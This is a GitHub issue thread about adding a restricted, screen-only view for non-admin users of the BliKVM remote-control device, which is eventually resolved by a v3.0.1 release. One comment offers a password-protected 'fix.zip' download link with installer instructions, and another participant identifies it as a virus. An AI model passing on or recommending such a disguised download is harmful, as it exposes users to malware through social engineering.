blikvm/blikvm #182: Limited view

simplehumble, 2024-08-29:
Hi, 
Is it possible to limit view where user can only see remote screen and no other buttons while admin can see everything? That way limited user can only interact with remote machine via web while he should access terminal, fileshare, atx turn-off, etc...

ThomasVon2021, 2024-08-29:
It's possible, it needs to be developed

simplehumble, 2024-08-29:
Will you have time to add at least option to remove/hide top bar maybe via command line? That would work too and would be greatly appreciated. 👍

marcelo-antonio-nunes, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ThomasVon2021, 2024-08-29:
> Download https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file password: changeme In the installer menu, select "gcc."

What is it?

youzi-2333, 2024-08-29:
> What is it?

This is a computer virus. Please delete this comment.

Also, don't use quote reply. GitHub may ban you because of the quote.

ThomasVon2021, 2024-08-29:
> Will you have time to add at least option to remove/hide top bar maybe via command line? That would work too and would be greatly appreciated. 👍

We will discuss how to design the management system.

simplehumble, 2024-09-20:
@ThomasVon2021 Will this be implemented sometime soon? I would really appreciate this and I believe many people would benefit from this. Even basic hide of top bar and just leaving screen only will be great too. Like setting in .ini file hide option, then rebooting and then just seeing only screen without top bar. That way end user won't be even be able to use anything from the top bar. We want to limit end user using top bar due to security reason.

m50S79sM6SRNp8Jn, 2024-09-20:
Right now our focus is on gaining enough stability to deliver our first beta release.
Once this is achieved, we can think of adding other features. 

Suggest keeping your eye on this issue so once it's there you can test it and provide your feedback.

simplehumble, 2024-09-20:
@ThomasVon2021 ok not a problem. if you could publish here steps to re-compile binary after editing this file so that I could myself recompile, I would really appreciate it. Just need to know what to do in what order. [blikvm-web-client](https://github.com/ThomasVon2021/blikvm-web-client/tree/f9e28af6f25dec85bbc6b525c64ae635f4864c87)/[src](https://github.com/ThomasVon2021/blikvm-web-client/tree/f9e28af6f25dec85bbc6b525c64ae635f4864c87/src)/[components](https://github.com/ThomasVon2021/blikvm-web-client/tree/f9e28af6f25dec85bbc6b525c64ae635f4864c87/src/components)/[tab](https://github.com/ThomasVon2021/blikvm-web-client/tree/f9e28af6f25dec85bbc6b525c64ae635f4864c87/src/components/tab)

/TabHome.vue

ThomasVon2021, 2024-09-21:
> @ThomasVon2021好的，没问题。如果您可以在此处发布编辑此文件后重新编译二进制文件的步骤，以便我自己可以重新编译，我将不胜感激。只需要知道按什么顺序做什么。blikvm [-web-client](https://github.com/ThomasVon2021/blikvm-web-client/tree/f9e28af6f25dec85bbc6b525c64ae635f4864c87) / [src](https://github.com/ThomasVon2021/blikvm-web-client/tree/f9e28af6f25dec85bbc6b525c64ae635f4864c87/src) / [components](https://github.com/ThomasVon2021/blikvm-web-client/tree/f9e28af6f25dec85bbc6b525c64ae635f4864c87/src/components) / [tab](https://github.com/ThomasVon2021/blikvm-web-client/tree/f9e28af6f25dec85bbc6b525c64ae635f4864c87/src/components/tab)
> 
> /TabHome.vue

I will do it for you.

ThomasVon2021, 2024-09-23:
[image]
Check this guide

tmkasuboski, 2025-03-11:
Any update on this change. I have multiple Blikvm V4s that I would love to implement this change?

blikvm, 2026-10-28:
Can you try to update the v3.0.1 image. It support this function now. https://github.com/blikvm/blikvm/releases
Much better than v2.x.x version. You can also play first https://blikvm.com/demo/